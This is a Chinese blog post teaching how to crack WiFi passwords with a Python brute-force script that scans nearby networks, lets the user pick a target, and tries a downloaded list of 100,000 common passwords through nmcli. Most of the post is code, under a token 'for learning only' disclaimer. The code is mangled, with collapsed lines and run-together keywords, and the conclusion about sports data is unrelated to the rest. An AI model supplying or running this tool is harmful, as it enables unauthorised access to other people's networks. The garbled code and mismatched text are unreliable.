怎么破解加密wifi密码呢

WiFi现在已经遍布我们生活方方面面,如今,如论到工作单位,还是租住的房子,或者一家餐厅,随处都可以连上WiFi。

因此,我们对WiFi密码的需求也没有之前那么迫切了。

如何破解WiFi密码?

本文,将会通过Python教大家如何实现,这里纯粹是为了学习用途。

1. WiFi列表

首先,我们需要获取附近的WiFi列表。

下面,就来写一个函数来获取附近的WiFi列表,函数命名为display_targets

def display_targets(networks, security_type): print("Select a target: \n")
    
    rows, columns = os.popen('stty size', 'r').read().split() for i in range(len(networks)):
        width = len(str(str(i+1)+". "+networks[i]+security_type[i]))+2 spacer = " " if (int(columns) >= 100):
            calc = int((int(columns)-int(width))*0.75) else:
                calc = int(columns)-int(width) for index in range(calc):
            spacer += "." if index == (calc-1):
                spacer += " " print(str(i+1)+". "+networks[i]+spacer+security_type[i])

这里,我们会用到ssid工具包,用来获取附近的WiFi列表,存入到参数networks

解锁WiFi密码,我只用了60行代码....

2. 选择WiFi

获取WiFi列表之后,下一步要做的就是选择我们想要连接的WiFi,

def prompt_for_target_choice(max): whileTrue: try:
            selected = int(input("\nEnter number of target: ")) if(selected >= 1and selected <= max): return selected - 1 except Exception as e:
            ignore = e

        print("Invalid choice: Please pick a number between 1 and " + str(max))

这里很简单,就是一些通用的Python功能。

3. 暴力破解

目前已经获取并且选择了想要连接的WiFi,那么如何获取到它的密码呢?

这里要用到一种比较常见的方式:暴力破解

这里,要用到Github上一个项目,它收集了最常用的10万个WiFi密码。我们就用着10万个密码暴力解锁WiFi即可。

def brute_force(selected_network, passwords, args): for password in passwords:
        # necessary due to NetworkManager restart after unsuccessful attempt at login
        password = password.strip()

        # when when obtain password from url we need the decode utf-8 however we doesnt when reading from file if isinstance(password, str):
            decoded_line = password else:
            decoded_line = password.decode("utf-8") if args.verbose isTrue: print(bcolors.HEADER+"** TESTING **: with password '" +
                decoded_line+"'"+bcolors.ENDC) if (len(decoded_line) >= 8): time.sleep(3)

            creds = os.popen("sudo nmcli dev wifi connect " +
                selected_network+" password "+decoded_line).read()
                
            # print(creds) if ("Error:"in creds.strip()): if args.verbose isTrue: print(bcolors.FAIL+"** TESTING **: password '" +
                        decoded_line+"' failed."+bcolors.ENDC) else:
                sys.exit(bcolors.OKGREEN+"** KEY FOUND! **: password '" +
                    decoded_line+"' succeeded."+bcolors.ENDC) else: if args.verbose isTrue: print(bcolors.OKCYAN+"** TESTING **: password '" +
                    decoded_line+"' too short, passing."+bcolors.ENDC) print(bcolors.FAIL+"** RESULTS **: All passwords failed :("+bcolors.ENDC)

核心功能3个函数就完成了,只用了60行Python代码!

下面就把它们串联在一起:

def main(): require_root() args = argument_parser()  # The user chose to supplied their own url if args.url isnotNone: passwords = fetch_password_from_url(args.url)  # user elect to read passwords form a file elif args.file isnotNone: file = open(args.file, "r") passwords = file.readlines() ifnot passwords: print("Password file cannot be empty!") exit(0) file.close() else:  # fallback to the default list as the user didnt supplied a password list default_url = "https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10-million-password-list-top-100000.txt" passwords = fetch_password_from_url(default_url)  # grabbing the list of the network ssids func_call = start(1) networks = func_call[0] security_type = func_call[1] ifnot networks: print("No networks found!") sys.exit(-1) display_targets(networks, security_type) max = len(networks) pick = prompt_for_target_choice(max) target = networks[pick] print("\nWifi-bf is running. If you would like to see passwords being tested in realtime, enable the [--verbose] flag at start.") brute_force(target, passwords, args)

执行函数,就会在命令行下显示附近的WiFi列表,选择之后就开始逐个尝试密码。

解锁WiFi密码,我只用了60行代码....

不同的颜色代表不同不同的结果:

  • 红色:测试失败
  • 绿色:破解成功
  • 紫色:测试中

现在,是不是发现这个看上去很复杂的事情变得简单许多?

结语

运动中充满了各种不同维度的数据,上述只是列举出一些我个人比较感兴趣的维度进行了分析与可视化。

希望,能够对你有所启示,能够发掘更有价值、有趣的信息,在学习和乐趣中得到最佳的实践。

原创文章作者:白回眸一笑,如若转载,请注明来自百香果号:https://bxg.huangjinbaixiangguo.com/article/91158.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
白回眸一笑的头像白回眸一笑
上一篇 2022年5月20日
下一篇 2022年5月20日

网友常看推荐

  • 为什么不建议买蒸烤一体机

    优点:1、功能更丰富:蒸烤一体机不仅能实现纯蒸、纯烤功能,还能实现蒸烤组合烹饪功能,可以实现肉类嫩烤、高温蒸焗等单一蒸箱或烤箱不能达到的烹饪效果,大大丰富了烹饪的菜品种类。另外,有…

    2022年4月16日
    05.9K0
  • 老婆查岗微信怎么隐藏好友

    各位网友好,很多时候我们好友聊天记录,或者是某些好友不想被自己的对象等发现,那么如何在不用删除,也不用拉黑的状态下隐藏,今天我来教教大家吧。 使用常见的方法是不行的,常见的方法就是…

    2022年10月10日
    05900
  • 新能源属于什么行业(新能源属于制造业吗)

    应该是属于制造业的,虽然是新能源,但本质上还是交通工具,汽车业还是属于制造业的。随着全球对环保和可持续发展的日益关注,新能源行业在过去的几年中一直呈现出蓬勃的发展态势。然而,近期新…

    2024年3月8日
    0850
  • 木牛流马是谁发明的

    想必也看过三国演义的,都会知道诸葛亮发明了木牛流马。书上写的是木牛流马是诸葛亮发明用来运输的工具,有时候也用于打仗,而且就算在现今社会也有人在用它。那么你见过,现实中的木牛流马长什…

    2022年7月10日
    04680
  • 二面是不是基本就定了

    关于面试,有的朋友问,好不容易初面过了,现在接到HR通知,安排二面,那么二轮面试需要准备什么?一般都会问什么问题? 二轮面试一般会问什么问题? 既然是二轮面试,说明初面已经通过了,…

    2023年8月21日
    02040
  • 脱发用什么生姜擦(脱发用生姜擦有效果吗)

    人们为了让“逝去”的头发复生,千百年来上下求索,创造出的偏方大多是刺激性的,如西医祖师爷希波克拉底曾用鸽子粪、孜然、芥末和荨麻调成的混合物治疗脱发,结果当然是“一根没剩”。生姜也不…

    2022年4月15日
    05130
  • 水果店从哪里进货便宜

    相信很多人都会纠结这个问题,一般开水果店到底去哪里拿货? 经常刷视频的朋友一定会刷到,某某某做水果大生意的直播还在发视频,在水果产地水果有多便宜多便宜,搞得大家恨不得马上去在他那里…

    2023年8月14日
    01570
  • 天猫超市有假货吗(天猫超市的东西是正品吗)

    天猫超市是淘宝天猫商城全新打造的本地网上零售超市,自上线以来,依托淘宝强大的电子商务管理系统,在系统平台、采购、仓储、配送、和客户关系管理等方面大力投入,以确保优质品牌商品能够通过…

    创业致富 2022年2月8日
    05910
  • 吃娃娃鱼犯法吗?

    娃娃鱼学名中国大鲵,是生活在淡水中的两栖动物。娃娃鱼是一种珍贵的野生动物,夜间的叫声犹如婴儿啼哭,所以称它为“娃娃鱼”。它名字中带有一个“鱼”字,但并非鱼类,是体形最大的两栖动物。…

    2022年7月26日
    04950
  • 女人算命一生或有大权

    国印贵人为八字神煞之一,是一个可以给人带来权力的吉神。如命带国印贵人,又逢生旺或有其他吉神相助,其人有掌权之能,可在国家机关执掌实权。 国印贵人的查法 国印贵人是以年干或日干的禄为…

    2022年10月14日
    06020

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注